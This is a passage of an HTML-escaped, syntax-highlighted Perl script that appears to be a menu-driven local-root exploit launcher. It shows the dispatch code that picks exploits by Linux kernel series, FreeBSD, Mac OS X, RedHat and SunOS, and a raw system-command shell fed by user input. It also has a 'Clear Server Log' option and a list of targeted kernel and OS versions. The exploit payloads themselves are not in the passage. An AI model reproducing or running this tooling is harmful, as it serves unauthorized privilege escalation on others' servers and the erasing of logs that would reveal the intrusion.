/&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/2.4.x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; local4&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/2.6.x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; local6&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/freebsd-x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; freebsd&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/mac-os-x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; mac&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/red-x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; red&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/sunos-x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; sun&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;else&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"Unknow Command !&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;help&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;--------------------------------------------------------&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;sysline&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Go To System Command Line]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;varline&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Go To var.pl Command Line]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;sysinfo&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Show System Information]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;sysproc&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Show Running Proccess's]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;config&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Show Config File]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;logs&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Show System Log File]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;all&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Show All Localroots In Database]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;gccinfo&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Check For gcc Installed Or Not Installed]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;logc&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Clear Server Log]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;2.2.x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of 2.2.x]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;2.4.x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of 2.4.x]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;2.6.x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of 2.6.x]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;freebsd-x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of FreeBSD]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;mac-os-x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of MacOS X]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;red-x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of RedHat]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;sunos-x&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Localroots of Sun Solaris OS]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;--------------------------------------------------------&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;sysline&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"system:"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$systemm&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: #339933;"&gt;&amp;lt;&amp;gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$systemm&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/varline/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; varline&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"$systemm"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; sysline&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;varline&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;all&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;a href="http://perldoc.perl.org/functions/q.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;q&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;27&lt;br /&gt;&lt;span style="color: #cc66cc;"&gt;2.2&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;x&lt;br /&gt;&lt;span style="color: #cc66cc;"&gt;2.4&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;2.6&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;17&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;18&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;19&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;20&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;21&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;22&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;22&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;10&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;23&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;24&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;25&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;26&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;span style="color: #339933;"&gt;.&lt;/span&gt;29&lt;br /&gt;&lt;span style="color: #cc66cc;"&gt;2.4&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;x&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;2&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;4&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;5&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;7&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;8&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;9&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;9&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;22&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;sh&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;9&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;34&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;9&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;55&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;10&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;11&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;12&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;13&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;13&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;17&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;13&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;17&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;3&lt;/span&gt;&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;14&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;15&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;16&lt;br /&gt;2&lt;span style="color: #339933;"&gt;.&lt;/span&gt;6&lt;span style="color: #339933;"&gt;.&lt;/span&gt;17&lt;br /&gt;&lt;span style="color: #cc66cc;"&gt;2.6&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;x&lt;br /&gt;FreeBSD &lt;span style="color: #cc66cc;"&gt;4.4&lt;/span&gt; &lt;span style="color: #339933;"&gt;-&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;4.6&lt;/span&gt;&lt;br /&gt;FreeBSD &lt;span style="color: #cc66cc;"&gt;4.8&lt;/span&gt;&lt;br /&gt;FreeBSD &lt;span style="color: #cc66cc;"&gt;5.3&lt;/span&gt;&lt;br /&gt;Mac OS X&lt;br /&gt;red&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;7.3&lt;/span&gt;&lt;br /&gt;red&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;8.0&lt;/span&gt;&lt;br /&gt;red&lt;span style="color: #339933;"&gt;-&lt;/span&gt;hat8&lt;span style="color: #339933;"&gt;.&lt;/span&gt;0&lt;span style="color: #339933;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;br /&gt;redhat &lt;span style="color: #cc66cc;"&gt;7.0&lt;/span&gt;&lt;br /&gt;redhat &lt;span style="color: #cc66cc;"&gt;7.1&lt;/span&gt;&lt;br /&gt;SunOS &lt;span style="color: #cc66cc;"&gt;5.7&lt;/span&gt;&lt;br /&gt;SunOS &lt;span style="color: #cc66cc;"&gt;5.8&lt;/span&gt;&lt;br /&gt;SunOS &lt;span style="color: #cc66cc;"&gt;5.9&lt;/span&gt;&lt;br /&gt;SunOS &lt;span style="color: #cc66cc;"&gt;5.10&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span 